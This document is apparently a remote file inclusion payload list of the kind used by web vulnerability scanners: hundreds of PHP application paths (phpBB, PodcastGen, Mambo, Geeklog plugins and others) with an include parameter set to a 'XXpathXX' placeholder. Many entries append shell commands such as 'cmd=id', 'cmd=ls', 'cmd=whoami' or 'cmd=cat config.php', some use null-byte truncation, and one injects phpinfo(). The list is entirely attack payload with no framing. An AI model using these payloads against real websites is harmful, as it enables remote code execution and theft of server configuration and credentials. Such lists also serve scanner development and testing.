/param_editor.php?folder=XXpathXX?
|
||||
/parse/parser.php?WN_BASEDIR=XXpathXX
|
||||
/patch/?language_id=XXpathXX
|
||||
/patch/tools/send_reminders.php?noSet=0&includedir=XXpathXX?
|
||||
/paypalipn/ipnprocess.php?INC=XXpathXX?
|
||||
/pda/pda_projects.php?offset=XXpathXX
|
||||
/phfito/phfito-post?SRC_PATH=XXpathXX
|
||||
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=XXpathXX
|
||||
/photo_comment.php?toroot=XXpathXX
|
||||
/php-inc/log.inc.php?SKIN_URL=XXpathXX
|
||||
/php-include-robotsservices.php?page=XXpathXX
|
||||
/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
|
||||
/php.incs/common.inc.php?cm_basedir=XXpathXX?
|
||||
/php/init.gallery.php?include_class=XXpathXX/something
|
||||
/php121db.php?php121dir=XXpathXX%00
|
||||
/php4you.php?dir=XXpathXX?
|
||||
/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=XXpathXX?
|
||||
/phpBB2/shoutbox.php?phpbb_root_path=XXpathXX
|
||||
/phpCards.header.php?CardPath=XXpathXX?
|
||||
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
|
||||
/phpMyChat.php3?=XXpathXX?cmd=id
|
||||
/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=XXpathXX?
|
||||
/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=XXpathXX?
|
||||
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
|
||||
/phpbb/sendmsg.php?phpbb_root_path=XXpathXX
|
||||
/phpcalendar/includes/calendar.php?phpc_root_path=XXpathXX?
|
||||
/phpcalendar/includes/setup.php?phpc_root_path=XXpathXX?
|
||||
/phpdebug_PATH/test/debug_test.php?debugClassLocation=XXpathXX
|
||||
/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=XXpathXX
|
||||
/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=XXpathXX
|
||||
/phphd_downloads/common.php?phphd_real_path=XXpathXX
|
||||
/phphost_directoryv2/include/admin.php?rd=XXpathXX?
|
||||
/phphtml.php?htmlclass_path=XXpathXX
|
||||
/phpi/edit_top_feature.php?include_connection=XXpathXX
|
||||
/phpi/edit_topics_feature.php?include_connection=XXpathXX
|
||||
/phplib/site_conf.php?ordnertiefe=XXpathXX
|
||||
/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/module/referenz.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=XXpathXX
|
||||
/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=XXpathXX
|
||||
/phplinks/includes/smarty.php?full_path_to_public_program=XXpathXX
|
||||
/phporacleview/inc/include_all.inc.php?page_dir=XXpathXX?
|
||||
/phppc/poll.php?is_phppc_included=1&relativer_pfad=XXpathXX?
|
||||
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=XXpathXX?
|
||||
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=XXpathXX?
|
||||
/phpquickgallery/gallery_top.inc.php?textFile=XXpathXX
|
||||
/phpreactor/inc/polls.inc.php?pathtohomedir=XXpathXX?
|
||||
/phpreactor/inc/updatecms.inc.php?pathtohomedir=XXpathXX?
|
||||
/phpreactor/inc/users.inc.php?pathtohomedir=XXpathXX?
|
||||
/phpreactor/inc/view.inc.php?pathtohomedir=XXpathXX?
|
||||
/phpress/adisplay.php?lang=XXpathXX
|
||||
/phpunity-postcard.php?plgallery_epost=1&gallery_path=XXpathXX?
|
||||
/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=XXpathXX
|
||||
/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=XXpathXX
|
||||
/phpyabs/moduli/libri/index.php?Azione=XXpathXX
|
||||
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=XXpathXX
|
||||
/playlist.php?phpbb_root_path=XXpathXX
|
||||
/plugin/HP_DEV/cms2.php?s_dir=XXpathXX?
|
||||
/plugin/gateway/gnokii/init.php?apps_path[plug]=XXpathXX?
|
||||
/plugins/1_Adressbuch/delete.php?folder=XXpathXX
|
||||
/plugins/BackUp/Archive.php?bkpwp_plugin_path=XXpathXX?
|
||||
/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=XXpathXX?
|
||||
/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=XXpathXX?
|
||||
/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=XXpathXX?
|
||||
/plugins/links/functions.inc?_CONF[path]=XXpathXX
|
||||
/plugins/polls/functions.inc?_CONF[path]=XXpathXX
|
||||
/plugins/rss_importer_functions.php?sitepath=XXpathXX?
|
||||
/plugins/safehtml/HTMLSax3.php?dir[plugins]=XXpathXX?
|
||||
/plugins/safehtml/safehtml.php?dir[plugins]=XXpathXX?
|
||||
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/Import.Admin.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=XXpathXX
|
||||
/plugins/staticpages/functions.inc?_CONF[path]=XXpathXX
|
||||
/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=XXpathXX
|
||||
/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=XXpathXX
|
||||
/plus.php?_pages_dir=XXpathXX?
|
||||
/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=XXpathXX?
|
||||
/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX
|
||||
/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX?
|
||||
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=XXpathXX
|
||||
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=XXpathXX
|
||||
/poll/view.php?int_path=XXpathXX
|
||||
/pollvote.php?pollname=XXpathXX?&cmd=ls
|
||||
/pop.php?base=XXpathXX
|
||||
/popup_window.php?site_isp_root=XXpathXX?
|
||||
/port.php?content=XXpathXX
|
||||
/portal/includes/portal_block.php?phpbb_root_path=XXpathXX
|
||||
/portal/portal.php?phpbb_root_path=XXpathXX?
|
||||
/portfolio.php?id=XXpathXX
|
||||
/portfolio/commentaires/derniers_commentaires.php?rep=XXpathXX?
|
||||
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=XXpathXX
|
||||
/prepare.php?xcart_dir=XXpathXX?
|
||||
/prepend.php?_PX_config[manager_path]=XXpathXX
|
||||
/preview.php?php_script_path=XXpathXX?&cmd=dir
|
||||
/principal.php?conteudo=XXpathXX
|
||||
/print.php?page=XXpathXX
|
||||
/print.php?pager=XXpathXX
|
||||
/print.php?print=XXpathXX?
|
||||
/process.php?DEFAULT_SKIN=XXpathXX
|
||||
/professeurs/index.php?repertoire_config=XXpathXX
|
||||
/profil.php?config[root_ordner]=XXpathXX?&cmd=id
|
||||
/projects/weatimages/demo/index.php?ini[langpack]=XXpathXX
|
||||
/promocms/newspublish/include.php?path[bdocroot]=XXpathXX
|
||||
/protection.php?logout_page=XXpathXX?
|
||||
/provider/auth.php?xcart_dir=XXpathXX?
|
||||
/psynch/nph-psa.exe?css=XXpathXX
|
||||
/psynch/nph-psf.exe?css=XXpathXX
|
||||
/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=XXpathXX?
|
||||
/public_html/modules/Forums/favorites.php?nuke_bb_root_path=XXpathXX?
|
||||
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=XXpathXX
|
||||
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=XXpathXX
|
||||
/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=XXpathXX?
|
||||
/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=XXpathXX?
|
||||
/qte_web.php?qte_web_path=XXpathXX?
|
||||
/quick_reply.php?phpbb_root_path=XXpathXX&mode=[file]
|
||||
/quickie.php?QUICK_PATH=XXpathXX?&cmd=id
|
||||
/random2.php?path_to_folder=XXpathXX
|
||||
/randshop/index.php?incl=XXpathXX?
|
||||
/rdf.php?page[path]=XXpathXX?&cmd=ls
|
||||
/reactivate.php?base_dir=XXpathXX
|
||||
/read.php?data=XXpathXX?
|
||||
/readmore.php?config["sipssys"]=XXpathXX
|
||||
/recent.php?insPath=XXpathXX
|
||||
/rechnung.php?_PHPLIB[libdir]=XXpathXX?
|
||||
/reconfig.php?GLOBALS[CLPath]=XXpathXX
|
||||
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=XXpathXX
|
||||
/redirect.php?url=XXpathXX
|
||||
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=XXpathXX
|
||||
/register.php?base_dir=XXpathXX
|
||||
/releasenote.php?mosConfig_absolute_path=XXpathXX
|
||||
/rempass.php?lang=XXpathXX
|
||||
/report.php?scriptpath=XXpathXX?
|
||||
/reports/who_r.php?bj=XXpathXX
|
||||
/resources/includes/class.Smarty.php?cfg[sys][base_path]=XXpathXX
|
||||
/ressourcen/dbopen.php?home=XXpathXX?
|
||||
/robotstats.inc.php?DOCUMENT_ROOT=XXpathXX?
|
||||
/root/public/code/cp_html2txt.php?page=XXpathXX
|
||||
/routines/fieldValidation.php?jssShopFileSystem=XXpathXX
|
||||
/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX
|
||||
/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX?
|
||||
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX
|
||||
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX?
|
||||
/rss.php?page[path]=XXpathXX?&cmd=ls
|
||||
/rss.php?phpraid_dir=XXpathXX
|
||||
/rss.php?premodDir=XXpathXX
|
||||
/rss2.php?page[path]=XXpathXX?&cmd=ls
|
||||
/run.php?dir=SHELL?&file=XXpathXX
|
||||
/s01.php?shopid=XXpathXX
|
||||
/s01.php?shopid=XXpathXX?
|
||||
/s02.php?shopid=XXpathXX?
|
||||
/s03.php?shopid=XXpathXX?
|
||||
/s04.php?shopid=XXpathXX?
|
||||
/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=XXpathXX
|
||||
/sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX
|
||||
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX
|
||||
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX?
|
||||
/sample/xls2mysql/parser_path=XXpathXX?
|
||||
/save.php?file_save=XXpathXX
|
||||
/saveserver.php?thisdir=XXpathXX
|
||||
/script//ident/index.php?path_inc=XXpathXX
|
||||
/script/_conf/core/common-tpl-vars.php?confdir=XXpathXX?
|
||||
/script/common.inc.php?path_inc=XXpathXX
|
||||
/script/gestion/index.php?path_inc=XXpathXX
|
||||
/script/ident/disconnect.php?path_inc=XXpathXX
|
||||
/script/ident/ident.inc.php?path_inc=XXpathXX
|
||||
/script/ident/identification.php?path_inc=XXpathXX
|
||||
/script/ident/loginliste.php?path_inc=XXpathXX
|
||||
/script/ident/loginmodif.php?path_inc=XXpathXX
|
||||
/script/index.php?path_inc=XXpathXX
|
||||
/script/init/createallimagecache.php?PATH_TO_CODE=XXpathXX
|
||||
/script/menu/menuadministration.php?path_inc=XXpathXX
|
||||
/script/menu/menuprincipal.php?path_inc=XXpathXX
|
||||
/script/param/param.inc.php?path_inc=XXpathXX
|
||||
/script/plugins/phpgacl/admin/index.php?path_inc=XXpathXX
|
||||
/script/template/index.php?main_page_directory=XXpathXX
|
||||
/script/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
|
||||
/script/tick/test.php?PATH_TO_CODE=XXpathXX
|
||||
/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=XXpathXX?
|
||||
/script_path/cms/classes/openengine/filepool.php?oe_classpath=XXpathXX?
|
||||
/script_path/installation/index.php?mosConfig_absolute_path=XXpathXX?
|
||||
/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=XXpathXX
|
||||
/scripts/check-lom.php?ETCDIR=XXpathXX
|
||||
/scripts/gallery.scr.php?GLOBALS[PTH][func]=XXpathXX?
|
||||
/scripts/lom_update.php?ETCDIR=XXpathXX
|
||||
/scripts/news.scr.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/scripts/polls.scr.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/scripts/rss.scr.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/scripts/search.scr.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX
|
||||
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX?
|
||||
/scripts/weigh_keywords.php?ETCDIR=XXpathXX
|
||||
/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=XXpathXX?
|
||||
/search.php?config["sipssys"]=XXpathXX
|
||||
/search.php?id=XXpathXX
|
||||
/search.php?insPath=XXpathXX
|
||||
/search/submit.php?config["sipssys"]=XXpathXX
|
||||
/search_wA.php?LIBPATH=XXpathXX
|
||||
/searchbot.php?path=XXpathXX
|
||||
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=XXpathXX
|
||||
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=XXpathXX?
|
||||
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=XXpathXX?
|
||||
/senetman/html/index.php?page=XXpathXX
|
||||
/services.php?page=XXpathXX
|
||||
/services/samples/inclusionService.php?CabronServiceFolder=XXpathXX%00
|
||||
/settings.php?P[includes]=XXpathXX
|
||||
/settings_sql.php?path=XXpathXX
|
||||
/setup/inc/database.php?tcms_administer_site=XXpathXX
|
||||
/setup/upgrader.php?RootDirectory=XXpathXX
|
||||
/sezhoo/SezHooTabsAndActions.php?IP=XXpathXX
|
||||
/shop/includes/header.inc.php?dateiPfad=XXpathXX
|
||||
/shop/index.php?action=XXpathXX?&cmd=cat%20config.php
|
||||
/shop/page.php?osCsid=XXpathXX?
|
||||
/shop/page.php?pageid=XXpathXX?
|
||||
/shoutbox.php?language=XXpathXX
|
||||
/shoutbox.php?root=XXpathXX?cmd=id
|
||||
/show.php?file=XXpathXX
|
||||
/show.php?id=XXpathXX
|
||||
/show.php?page=XXpathXX
|
||||
/show.php?path=XXpathXX
|
||||
/show_archives.php?cutepath=XXpathXX?
|
||||
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=XXpathXX
|
||||
/sid=XXpathXX
|
||||
/signer/final.php?smiley=XXpathXX?
|
||||
/signin.php?sent=1&AMG_serverpath=XXpathXX
|
||||
/sinagb.php?fuss=XXpathXX
|
||||
/sinapis.php?fuss=XXpathXX
|
||||
/sitebar/Integrator.php?file=XXpathXX
|
||||
/sitebar/index.php?writerFile=XXpathXX
|
||||
/sitebuilder/admin/top.php?admindir=XXpathXX
|
||||
/sitemap.xml.php?dir[classes]=XXpathXX
|
||||
/skin/board/default/doctype.php?dir=XXpathXX
|
||||
/skin/dark/template.php?path=XXpathXX
|
||||
/skin/gold/template.php?path=XXpathXX
|
||||
/skin/html/table.php?pachtofile=XXpathXX
|
||||
/skin/original/template.php?path=XXpathXX
|
||||
/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=XXpathXX
|
||||
/skins/advanced/advanced1.php?pluginpath[0]=XXpathXX
|
||||
/skins/default.php?dir_inc=XXpathXX
|
||||
/skins/header.php?ote_home=XXpathXX
|
||||
/skins/phpchess/layout_admin_cfg.php?Root_Path=XXpathXX
|
||||
/skins/phpchess/layout_cfg.php?Root_Path=XXpathXX
|
||||
/skins/phpchess/layout_t_top.php?Root_Path=XXpathXX
|
||||
/skysilver/login.tpl.php?theme=XXpathXX?
|
||||
/slogin_lib.inc.php?slogin_path=XXpathXX?
|
||||
/smarty.php?xcart_dir=XXpathXX?
|
||||
/smarty/smarty_class.php?_smarty_compile_path=XXpathXX
|
||||
/smilies.php?config=XXpathXX
|
||||
/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX?
|
||||
/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=XXpathXX?
|
||||
/snort/base_stat_common.php?BASE_path=XXpathXX
|
||||
/social_game_play.php?path=XXpathXX?
|
||||
/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=XXpathXX
|
||||
/song.php?phpbb_root_path=XXpathXX
|
||||
/source.php?bibtexrootrel=XXpathXX?
|
||||
/source/mod/rss/channeledit.php?Codebase=XXpathXX
|
||||
/source/mod/rss/post.php?Codebase=XXpathXX
|
||||
/source/mod/rss/view.php?Codebase=XXpathXX
|
||||
/source/mod/rss/viewitem.php?Codebase=XXpathXX
|
||||
/sources/Admin/admin_cats.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/Admin/admin_edit.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/Admin/admin_import.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/Admin/admin_templates.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/functions.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/help.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=XXpathXX
|
||||
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=XXpathXX
|
||||
/sources/mail.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/misc/new_day.php?path=XXpathXX
|
||||
/sources/news.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/post.php?fil_config=XXpathXX
|
||||
/sources/template.php?CONFIG[main_path]=XXpathXX
|
||||
/sources/tourney/index.php?page=XXpathXX?
|
||||
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=XXpathXX
|
||||
/spaw/spaw_control.class.php?spaw_root=XXpathXX
|
||||
/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=XXpathXX
|
||||
/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
|
||||
/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
|
||||
/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=XXpathXX
|
||||
/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=XXpathXX
|
||||
/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=XXpathXX
|
||||
/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=XXpathXX
|
||||
/spellcheckwindowframeset.php?SpellIncPath=XXpathXX
|
||||
/squirrelcart/cart_content.php?cart_isp_root=XXpathXX
|
||||
/src/ark_inc.php?cfg_pear_path=XXpathXX?
|
||||
/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=XXpathXX
|
||||
/src/scripture.php?pageHeaderFile=XXpathXX?
|
||||
/starnet/themes/c-sky/main.inc.php?cmsdir=XXpathXX?
|
||||
/start.php?lang=XXpathXX
|
||||
/start.php?pg=XXpathXX
|
||||
/stat_modules/users_age/module.php?phpbb_root_path=XXpathXX
|
||||
/stats.php?vwar_root=XXpathXX
|
||||
/stphpapplication.php?STPHPLIB_DIR=XXpathXX
|
||||
/stphpbtnimage.php?STPHPLIB_DIR=XXpathXX
|
||||
/stphpform.php?STPHPLIB_DIR=XXpathXX
|
||||
/str.php?p=XXpathXX
|
||||
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX
|
||||
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX?
|
||||
/strload.php?LangFile=XXpathXX
|
||||
/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=XXpathXX?
|
||||
/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=XXpathXX?
|
||||
/styles.php?toroot=XXpathXX
|
||||
/styles/default/global_header.php?installed=23&domain=XXpathXX
|
||||
/submit_abuse.php?path_prefix=XXpathXX
|
||||
/submit_comment.php?path_prefix=XXpathXX
|
||||
/subscp.php?phpbb_root_path=XXpathXX?
|
||||
/suite/index.php?pg=XXpathXX?
|
||||
/supasite/admin_auth_cookies.php?supa[db_path]=XXpathXX
|
||||
/supasite/admin_mods.php?supa[db_path]=XXpathXX
|
||||
/supasite/admin_news.php?supa[db_path]=XXpathXX
|
||||
/supasite/admin_settings.php?supa[include_path]=XXpathXX
|
||||
/supasite/admin_topics.php?supa[db_path]=XXpathXX
|
||||
/supasite/admin_users.php?supa[db_path]=XXpathXX
|
||||
/supasite/admin_utilities.php?supa[db_path]=XXpathXX
|
||||
/supasite/backend_site.php?supa[include_path]=XXpathXX
|
||||
/supasite/common_functions.php?supa[db_path]=XXpathXX
|
||||
/supasite/site_comment.php?supa[db_path]=XXpathXX
|
||||
/supasite/site_news.php?supa[db_path]=XXpathXX
|
||||
/support/include/open_form.php?include_dir=XXpathXX?cmd=pwd
|
||||
/support/index.php?main=XXpathXX
|
||||
/surveys/survey.inc.php?path=XXpathXX
|
||||
/sw/lib_comment/comment.php?doc_directory=XXpathXX?
|
||||
/sw/lib_find/find.php?doc_directory=XXpathXX?
|
||||
/sw/lib_session/session.php?doc_directory=XXpathXX?
|
||||
/sw/lib_up_file/file.php?doc_directory=XXpathXX?
|
||||
/sw/lib_up_file/find_file.php?doc_directory=XXpathXX?
|
||||
/sw/lib_user/find_user.php?doc_directory=XXpathXX?
|
||||
/sw/lib_user/user.php?doc_directory=XXpathXX?
|
||||
/sys/code/box.inc.php?config["sipssys"]=XXpathXX
|
||||
/system/ImageImageMagick.php?glConf[path_system]=XXpathXX?
|
||||
/system/_b/contentFiles/gBIndex.php?gBRootPath=XXpathXX?
|
||||
/system/admin/include/item_main.php?GLOBALS=XXpathXX
|
||||
/system/admin/include/upload_form.php?GLOBALS=XXpathXX
|
||||
/system/command/admin.cmd.php?GLOBALS=XXpathXX
|
||||
/system/command/download.cmd.php?GLOBALS=XXpathXX
|
||||
/system/funcs/xkurl.php?PEARPATH=XXpathXX
|
||||
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=XXpathXX
|
||||
/system/login.php?site_path=XXpathXX
|
||||
/tagit2b/tagmin/delTagUser.php?configpath=XXpathXX?
|
||||
/tags.php?BBCodeFile=XXpathXX
|
||||
/taxonservice.php?dir=XXpathXX?
|
||||
/teatro/pub/pub08_comments.php?basePath=XXpathXX
|
||||
/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=XXpathXX?
|
||||
/template.php?actionsPage=XXpathXX?
|
||||
/template.php?blog_theme=XXpathXX
|
||||
/template.php?pagina=XXpathXX
|
||||
/template/Noir/index.php?site_path=XXpathXX
|
||||
/template/Vert/index.php?pageAll=XXpathXX
|
||||
/template/Vert/index.php?site_path=XXpathXX
|
||||
/template/barnraiser_01/p_new_password.tpl.php?templatePath=XXpathXX
|
||||
/template/default/footer.php?ROOT_PATH=XXpathXX?cmd=ls
|
||||
/template/default/test/header.php?ROOT_PATH=XXpathXX?cmd=ls
|
||||
/template/gwb/user_bottom.php?config[template_path]=XXpathXX
|
||||
/template/purpletech/base_include.php?page=XXpathXX?
|
||||
/template/rwb/user_bottom.php?config[template_path]=XXpathXX
|
||||
/template_csv.php?rInfo[content]=XXpathXX
|
||||
/templates/2blue/bodyTemplate.php?serverPath=XXpathXX?
|
||||
/templates/Official/part_userprofile.php?template_path=XXpathXX
|
||||
/templates/barrel/template.tpl.php?renderer=XXpathXX
|
||||
/templates/barrel/template.tpl.php?renderer=XXpathXX?
|
||||
/templates/barry/template.tpl.php?renderer=XXpathXX
|
||||
/templates/be2004-2/index.php?mosConfig_absolute_path=XXpathXX
|
||||
/templates/datumVonDatumBis.inc.php?root=XXpathXX
|
||||
/templates/default/header.inc.php?menu=XXpathXX
|
||||
/templates/default/index_logged.php?main_loaded=1&cur_module=XXpathXX
|
||||
/templates/default/tpl_message.php?right_file=XXpathXX
|
||||
/templates/footer.inc.php?root=XXpathXX
|
||||
/templates/header.inc.php?root=XXpathXX
|
||||
/templates/mylook/template.tpl.php?renderer=XXpathXX
|
||||
/templates/oerdec/template.tpl.php?renderer=XXpathXX
|
||||
/templates/pb/language/lang_nl.php?temppath=XXpathXX
|
||||
/templates/penguin/template.tpl.php?renderer=XXpathXX
|
||||
/templates/sidebar/template.tpl.php?renderer=XXpathXX
|
||||
/templates/slashdot/template.tpl.php?renderer=XXpathXX
|
||||
/templates/stylesheets.php?root=XXpathXX
|
||||
/templates/text-only/template.tpl.php?renderer=XXpathXX
|
||||
/templates/tmpl_dfl/scripts/index.php?dir[inc]=XXpathXX
|
||||
/theme/breadcrumb.php?rootBase=XXpathXX?
|
||||
/theme/default.php?root=XXpathXX
|
||||
/theme/format.php?_page_content=XXpathXX?
|
||||
/theme/format.php?_page_css=XXpathXX?
|
||||
/theme/frames1.php?root=XXpathXX
|
||||
/theme/frames1_center.php?root=XXpathXX
|
||||
/theme/frames1_left.php?root=XXpathXX
|
||||
/theme/frames1_top.php?root=XXpathXX
|
||||
/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=XXpathXX
|
||||
/theme/settings.php?pfad_z=XXpathXX
|
||||
/theme/test1.php?root=XXpathXX
|
||||
/theme/test2.php?root=XXpathXX
|
||||
/theme/test3.php?root=XXpathXX
|
||||
/theme/test4.php?root=XXpathXX
|
||||
/theme/test5.php?root=XXpathXX
|
||||
/theme/test6.php?root=XXpathXX
|
||||
/themes.php?GLOBALS[theme_path]=XXpathXX?
|
||||
/themes/blackorange.php?root=XXpathXX
|
||||
/themes/container.php?theme_directory=XXpathXX%00
|
||||
/themes/default/layouts/standard.php?page_include=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
|
||||
/themes/default/preview_post_completo.php?dir=XXpathXX
|
||||
/themes/header.php?theme_directory=XXpathXX%00
|
||||
/themes/ubb/login.php?theme=XXpathXX
|
||||
/themes/ubb/login.php?theme=XXpathXX?
|
||||
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=XXpathXX
|
||||
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=XXpathXX
|
||||
/timedifference.php?la=XXpathXX
|
||||
/toolbar.loudmouth.php?mainframe=XXpathXX
|
||||
/tools/update_translations.php?_SESSION[path]=XXpathXX?
|
||||
